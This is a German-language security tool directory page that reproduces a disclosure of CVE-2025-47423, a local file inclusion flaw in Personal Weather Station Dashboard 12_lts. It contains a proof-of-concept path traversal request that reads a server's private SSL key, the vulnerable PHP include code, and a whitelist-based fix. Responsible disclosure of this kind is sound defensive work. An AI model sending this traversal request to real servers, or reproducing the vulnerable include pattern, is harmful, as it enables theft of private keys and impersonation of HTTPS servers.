Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47423 — Detaillierte Offenlegung von CVE-2025-47423: Lokale Dateieinbindung im Dashboard für persönliche Wetterstation 12_lts. Enthält PoC, Analyse des verwundbaren Codes und Empfehlungen für sichere Korrekturen für defensives Lernen. | Kitploit
Tools/GitHubGitHub/haluka92/cve-2025-47423
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & BildungKuratierte Ressourcen
GitHubhaluka92/cve-2025-47423

CVE-2025-47423

Detaillierte Offenlegung von CVE-2025-47423: Lokale Dateieinbindung im Dashboard für persönliche Wetterstation 12_lts. Enthält PoC, Analyse des verwundbaren Codes und Empfehlungen für sichere Korrekturen für defensives Lernen.

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-47423 – Lokale Dateieinbindung im Personal Weather Station Dashboard (12_lts)

Entdeckt von: Matthew Eagle
Status: Öffentliche Offenlegung
Gemeldet am: 2025-05-05
CVE ID: CVE-2025-47423


🧩 Zusammenfassung

Eine Schwachstelle zur lokalen Dateieinbindung (LFI) im Personal Weather Station Dashboard Version 12_lts ermöglicht nicht authentifizierten entfernten Angreifern, beliebige Dateien auf dem Server zu lesen. Die Ausnutzung dieser Schwachstelle gewährt Zugriff auf sensible Dateien, einschließlich privater SSL-Schlüssel, und kann die Vertraulichkeit und Integrität von HTTPS-Verbindungen gefährden.


🛠 Betroffene Komponente

  • Datei: /others/_test.php
  • Angreifbarer Parameter: test (über GET)

📈 Auswirkungen

Diese Schwachstelle ermöglicht entfernten Angreifern:

  • Beliebige Dateien im Dateisystem lesen
  • Private SSL-Schlüssel offenlegen (z.B. server.key)
  • Man-in-the-Middle-Angriffe (MITM) durchführen
  • Den HTTPS-Server impersonieren

CVSS: 5.8 Mittel


💥 Proof of Concept (PoC)

root@kitploit:~
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com

Antwort:

root@kitploit:~
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----

🧪 Anfälliger Code (vereinfacht)

root@kitploit:~
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);

Die str_replace-Funktion ist unzureichend, um Directory Traversal zu verhindern.


🔐 Sicherer Fix

  • Strenge Whitelist-Zulassung für Include-Ziele verwenden
  • Eingabe mit basename() bereinigen und gegen erlaubte Dateien prüfen
  • Dynamische Einbindung basierend auf Benutzereingaben vermeiden
root@kitploit:~
$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';

if (!in_array($script, $allowed_tests)) {
    die("Invalid test file.");
}

include(__DIR__ . '/scripts/' . $script);

📅 Zeitplan

DatumEreignis
2025-05-05Sicherheitslücke an PWS-Dashboard-Moderatoren gemeldet
2025-05-06Bestätigung und Tests beobachtet
2025-05-07CVE-2025-47423 über MITRE reserviert
TBDÖffentlicher Patch und CVE-Eintrag ausstehend

🧠 Abhilfemaßnahmen

Wenn Sie das Personal Weather Station Dashboard 12_lts verwenden, sollten Sie:

  • _test.php sofort entfernen oder aktualisieren
  • Das reparierte Skript mit Datei-Whitelist implementieren
  • Kompromittierte TLS-Zertifikate rotieren und neu ausstellen

🧾 Referenzen

  • CVE-2025-47423 auf MITRE (ausstehend)
  • Advisory auf GitHub veröffentlicht

🙏 Anerkennung

Sicherheitslücke entdeckt und verantwortungsvoll offengelegt von Matthew Eagle
Kontakt: [email protected]


Die Offenlegung erfolgte in Abstimmung mit den Richtlinien für verantwortungsvolle Offenlegung. Dieses Dokument wird zu Bildungs- und Verteidigungszwecken veröffentlicht.

Tool herunterladen